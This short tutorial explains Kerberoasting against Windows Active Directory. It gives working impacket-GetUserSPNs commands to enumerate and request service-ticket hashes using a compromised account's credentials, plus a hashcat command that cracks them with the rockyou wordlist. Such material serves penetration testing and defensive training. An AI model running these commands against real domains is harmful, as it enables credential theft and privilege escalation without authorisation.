Kerberoasting is a technique attackers use in Windows Active Directory environments to steal service account credentials. It works by requesting a Kerberos service ticket for a service account that uses a weak or guessable password. The ticket is encrypted with the account’s password hash, so once an attacker obtains it, they can take it offline and attempt to crack it without alerting the system. If successful, they gain the cleartext password for that service account, which often has elevated privileges. This makes kerberoasting a stealthy and powerful method for moving deeper into a network.
This only works on domains that use Service Accounts.
Example > In Active Directory > View > Enable Advanced View > Under user > Attribute Editor > ServicePrincipleName > username/server@domain-name.local
How to install Kerberoasting
<!-- Use credentials from a compromished account to run this command-->
impacket-GetUserSPNs -dc-ip server-ip-address domain-name.local/username
<!-- Get the hash-->
impacket-GetUserSPNs -dc-ip server-ip-address domain-name.local/username -request
<!-- Create .txt file with hash and run hashcat to crack -->
nano hash.txt
hashcat -m 13100 -a 0 hash.txt /usr/share/wordlists/rockyou.txt